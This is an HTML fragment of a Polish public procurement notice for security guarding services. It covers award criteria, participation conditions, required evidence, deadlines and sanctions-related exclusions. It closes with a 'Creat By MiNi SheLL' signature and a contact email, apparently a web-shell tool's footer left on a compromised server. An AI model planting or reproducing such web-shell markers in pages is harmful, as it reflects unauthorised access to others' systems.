<span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteriami oceny ofert są:<br/>a)	cena oferty (C) - 60 %<br/>b)	doświadczenie Koordynatora ochrony (D) - 40 %<br/><br/>2.	Sposób wyboru najkorzystniejszej oferty.<br/><br/>1)	Ilość punktów w zakresie kryterium „cena oferty” wyznaczana będzie ze wzoru:<br/><br/> Cena oferty najniższej <br/> C = --------------------------------- x 100 x W (W – waga kryterium 60 %) <br/> Cena oferty badanej <br/> <br/>Ilość punktów wyliczana (w danym kryterium) z ww. wzoru będzie zaokrąglana do dwóch miejsc po przecinku wg zasad matematycznych, tj. wartości równe lub wyższe od 5 – <br/>w górę, a poniżej 5 – w dół.<br/>Maksymalnie za to kryterium zamawiający może przyznać 60 pkt.<br/><br/>2)	Punkty za kryterium „doświadczenie koordynatora ochrony” - zostaną przyznane zgodnie z rozdz. XIII ust. 2 pkt 2 SWZ.<br/><br/>Uwaga: Brak wpisania w pkt 2 Formularza oferty imienia i nazwiska Koordynatora ochrony lub brak wskazania w ogóle ilości pełnienia funkcji (przez wskazaną osobę) Koordynatora ochrony z których to każda obejmowała bezpośrednią ochronę fizyczną mienia w budynku lub budynkach użyteczności publicznej, trwała przez okres co najmniej 12 miesięcy i miała wartość minimum 300 000,00 złotych brutto, lub wskazania więcej niż jedną pozycję (zaznaczy więcej niż jeden chekbox) dot. ilości pełnienia funkcji Koordynatora ochrony z których to każda obejmowała bezpośrednią ochronę fizyczną mienia w budynku lub budynkach użyteczności publicznej, trwała przez okres co najmniej 12 miesięcy i miała wartość minimum 300 000,00 złotych brutto - spowoduje, że za to kryterium oceny ofert Zamawiający przyzna Wykonawcy 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Koordynatora ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy (o których mowa w art. 94 ust. 1 pkt 1) ustawy PZP), którzy spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym.<br/><br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów.<br/><br/>W celu potwierdzenia spełnienia warunku udziału w postępowaniu, Wykonawca winien wykazać, iż posiada ważną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony mienia, wydaną przez Ministra Spraw Wewnętrznych i Administracji zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia w zakresie nie węższym niż rodzaj i przedmiot ochrony opisany w przedmiocie zamówienia.<br/><br/>3)	sytuacji ekonomicznej lub finansowej.<br/><br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej. <br/><br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>a)	Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, że należycie wykonał, (a w przypadku świadczeń powtarzających się lub ciągłych wykonuje) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną usługę, która:<br/>	polegała na bezpośredniej ochronie fizycznej mienia w postaci budynku lub budynków użyteczności publicznej, <br/>	trwała przez nieprzerwany okres co najmniej 12 miesięcy, <br/>	miała wartość minimum 300 000,00 złotych brutto, <br/><br/>b)	Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował w okresie wykonywania zamówienia i skieruje do jego realizacji <br/>min. jedną osobę, która będzie pełniła funkcję koordynatora ochrony, wpisaną na listę kwalifikowanych pracowników ochrony, która co najmniej raz pełniła funkcję koordynatora ochrony dla usługi, która:<br/>	obejmowała bezpośrednią ochronę fizyczną mienia w budynku lub budynkach użyteczności publicznej, <br/>	trwała przez okres co najmniej 12 miesięcy, <br/>	miała wartość minimum 300 000,00 złotych brutto. <br/><br/>UWAGA<br/>Dodatkowe doświadczenie Koordynatora ochrony stanowi kryterium oceny ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych <br/>w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	koncesji na prowadzenie działalności gospodarczej w zakresie usług ochrony mienia, wydaną przez Ministra Spraw Wewnętrznych i Administracji zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, w zakresie nie węższym niż rodzaj i przedmiot ochrony opisany w przedmiocie zamówienia - w odniesieniu do warunku określonego w rozdz. V ust. 1 pkt 2 SWZ;<br/>2)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed terminem składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed terminem składania ofert zgodnie z wzorem stanowiącym Załącznik Nr 3 do SWZ – w odniesieniu do warunku określonego w rozdz. V ust. 1 pkt 4 lit a) SWZ;<br/>3)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z wzorem stanowiącym Załącznik Nr 4 do SWZ – w odniesieniu do warunku określonego w rozdz. V ust. 1 pkt 4 lit b) SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Oświadczenia Wykonawcy stanowiące wstępne potwierdzenie o niepodleganiu wykluczeniu oraz wstępne potwierdzenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdz. V SWZ sporządzone zgodnie ze wzorem stanowiącym Załącznik Nr 2 do SWZ przy czym oświadczenie to składają odrębnie wykonawca/każdy spośród wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji,<br/>2) Pełnomocnictwo (jeżeli dotyczy): w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>i. postępowania o zamówienie publiczne, którego dotyczy,<br/>ii. wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>iii. ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy):<br/>a) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>b) w przypadku, o którym mowa w pkt a) wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>Ponadto wykonawcy wspólnie ubiegających się o udzielenie zamówienia zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w rozdz. VI<br/>ust. 2 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w rozdz. VI ust. 2 pkt 1, 2 i 3 SWZ składa odpowiednio wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców warunek, o którym mowa w rozdz. III ust. 9 SWZ winien spełnić w całości każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określa projekt umowy, stanowiący załącznik Nr 5 <br/>do SWZ. <br/>2.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ustawy oraz wskazanym we projekcie umowy, stanowiącym załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć na platformie (pod adresem https://pnujsciewarty.ezamawiajacy.pl)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA: 1. Zamawiający informuje, że wykluczeniu z postęp. - w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dn. 13.04.2022r. o szczeg. Rozwiąż. w zakr.przeciwdział. wspieraniu agresji na Ukrainę oraz służących ochronie bezpiecz.narodowego - podlegają także: 1)Wykonawcy wymienieni w wykazach określ. w rozporz. Rady (WE) nr 765/2006<br/>z dn.18.05.2006r. dot. środków ogranicz. w zw. z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy(Dz.Urz.UE L 134 z 20.05.2006, str. 1,z późn. zm.) i rozporz.Rady (UE) nr 269/2014 z dn.17.03.2014r. w sprawie środków ogranicz.w odniesieniu do działań podważaj. integralność teryt., suwerenność i niezależ.Ukrainy lub im zagrażaj.<br/>(Dz.Urz.UE L 78 z 17.03.2014, str. 6, z późn. zm.) albo wpisani na listę o której mowa w art. 2 ustawy z dn.13.04.2022r. o szczeg.rozwiązaniach w zakr. przeciwdział. wspieraniu agresji na Ukrainę oraz służących ochronie bezpiecz. Narod., na podst. dec. Ws. wpisu na ww. listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 powołanej ustawy;<br/>2)Wykonawcy, których beneficjentem rzeczyw. w rozumieniu ustawy z dn.1.03.2018 r. o przeciwdział. praniu pieniędzy oraz finansów. terroryzmu (Dz.U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określ. w rozporz. Rady (WE) nr 765/2006 z dn.18.05.2006 r. dot. środków ogranicz. w zw. z syt. na Białorusi i udziałem Białorusi w agresji Rosji wobec<br/>Ukrainy (Dz.Urz.UE L 134 z 20.05.2006, str. 1, z późn. zm.) i rozporz. Rady (UE) nr 269/2014 z dn. 17.05.2014r. ws. środków ogranicz. w odniesieniu do działań podważ. integralność teryt., suwerenność i niezależność Ukrainy lub im zagrażaj.(Dz.Urz.UE L 78 z 17.03.2014, str. 6, z późn. zm.) albo wpisani na listę o której mowa w art. 2 ustawy z dn. 13.04.2022r. o szczeg. Rozwiąż. w zakr. przeciwdział. wspieraniu agresji na Ukrainę oraz służących ochronie bezpiecz.<br/>Narod., lub będący takim beneficjentem rzeczywist.od dn.24.02.2022r., o ile zostali wpisani na ww. listę na podst. decyzji ws. wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dn. 13.04.2022r. o szczeg. Rozwiąż. w zakr. przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpiecz. Narod.; 3) Wykonawcy,<br/>których jednostką dominuj. w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dn.29.09.1994r. o rachunkowości (Dz.U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określ. w rozporz. Rady (WE) nr 765/2006 z dn. 18.05.2006r. dot. środków ogranicz.. w zw. z syt. na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z<br/>20.05.2006, str. 1, z późn. zm.) i rozporz. Rady (UE) nr 269/2014 z dn.17.03.2014r. ws. środków ogranicz. w odniesieniu do działań podważających integralność teryt., suwerenność i niezależność Ukrainy lub im zagrażaj. (Dz.Urz.UE L 78 z 17.03.2014, str. 6, z późn. zm.) albo wpisany na listę,o której mowa w art. 2 ustawy z dn.13.04.2022r. o szczeg. Rozwiąż. w zakr. przeciwdział. wspieraniu agresji na Ukrainę oraz służących ochronie bezpiecz. narod., lub będący taką jednostką<br/>dominującą od dn. 24.02.2022r., o ile został wpisany na listę na podst. decyzji ws. wpisu na ww. listę rozstrzygającej o zastos. środka, o którym mowa w art. 1 pkt 3 ustawy z dn. 13.04.2022r. o szczeg. Rozwiąż. w zakr. przeciwdział. wspieraniu agresji na Ukrainę oraz służących ochronie bezpiecz. narod. 2. W/w wykluczenie następuje na okres trwania ww. okoliczności. 3. W przypadku Wykonawcy wykluczonego na podstawie w/w przesłanek Zamawiający odrzuca ofertę takiego<br/>Wykonawcy. 4.Osoba lub podmiot podleg. wykluczeniu, które w okresie tego wykluczenia ubiegają się o udzielenie zam. publ. lub biorą udział w postępowaniu o udzielenie zam. publ., podlegają karze pienięż. Karę pieniężną, nakłada Prezes UZP, w drodze decyzji, w wys. do 20 000 000 zł

Creat By MiNi SheLL
Email: jattceo@gmail.com